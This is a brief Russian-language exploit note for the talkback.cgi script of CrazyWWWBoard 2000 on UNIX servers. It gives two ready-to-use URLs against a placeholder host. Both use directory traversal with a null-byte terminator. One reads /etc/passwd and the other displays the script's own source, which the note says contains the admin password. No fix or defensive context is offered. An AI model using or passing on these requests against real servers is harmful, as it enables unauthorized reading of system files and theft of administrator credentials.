Тalkback.cgi (CrazyWWWBoard 2000) в
UNIX системах позволяет просматривать любой
файл на сервере. Следующий URL покажет
например /etc/passwd (уберите ненужные пробелы):
http://www.VULNERABLE-HOST.com/cgi- bin/talkback.cgi?article=
../../../../../../../../etc/passwd%00 &action=view&matchview=1
Такая команда покажет
сам talkback.cgi, в котором, кстати, покоится и
пароль админа:
http://www.VULNERABLE-HOST.com/cgi- bin/talkback.cgi?article=
../cgi-bin/talkback.cgi%00 &action=view&matchview=1